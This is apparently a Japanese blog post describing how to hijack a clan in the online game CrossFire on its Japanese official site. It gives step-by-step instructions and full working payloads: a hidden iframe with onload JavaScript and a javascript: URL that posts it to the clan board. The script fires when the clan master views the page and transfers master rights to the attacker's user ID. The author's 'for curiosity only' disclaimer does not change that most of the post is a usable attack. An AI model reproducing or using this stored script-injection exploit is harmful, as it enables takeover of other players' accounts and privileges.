クロスファイアのクランを乗っ取る方法

日本のクロスファイアに関する裏ワザシリーズ第1弾！

このシリーズは知的好奇心を満たす目的で書いています。悪意のあるユーザーは使わないでください。善意でも駄目です。

1時間程度で完成したもので理論上は動作するけども、やっちゃいけません。妄想して楽しんでください。

以下の作業はすべてGoogle Chromeで行うことができます。目指せGoogle Chromeシェア率トップ。

 

早速やり方を説明。

まずここからブラウザ判定を迂回して公式ページにアクセス。

次にログインし、URLバーにview-source:http://crossfire.arario.jp/goClanPage.action?pageName=clanRoomと入力しジャンプ。

表示されたソースコードの中にご丁寧にuserIdが記述されているので記憶しておく。

記憶したらマイクランページに移動。

<iframe src=”http://crossfire.arario.jp/memberPopup.action?mode=manage&userId=先ほど記憶したuserId” name=”a” onload=”b=a.document.getElementById(‘updateForm’);b.target=’ifrLogout’;b.method=’POST’;b.mode.value=’m0′;b.action=’updateClanUser.action’;a.location.href=’javascript:document.updateForm.submit()’;” width=”0” height=”0”></iframe>

上記のコードをクランページの掲示板に書き込むのだが、普通にはできないのでコメント入力欄に入力してある状態でURLバーに下記コードをURLバーに入力しジャンプする。（上下両方ともコードに改行はありません。）

javascript:a=document.writeCommentForm;a.contents.value=comment.value;a.action=”insertComment.action”;a.method=”POST”;a.target=”ifrLogout”;a.submit();

あとはクランマスターがクランページにアクセスしたときに上記のスクリプトが動作し、IframeのURLに書かれているIDにクランマスターの権限が飛んでくる。

 

知識がなくてもこんなことができるようでいいのだろうか。まぁこうなっては公式ページを1から作り直さなくてはどうしようもない状態だと思うけども。

 

意見や要望はTwitter、Skype、コメントにてどうぞ。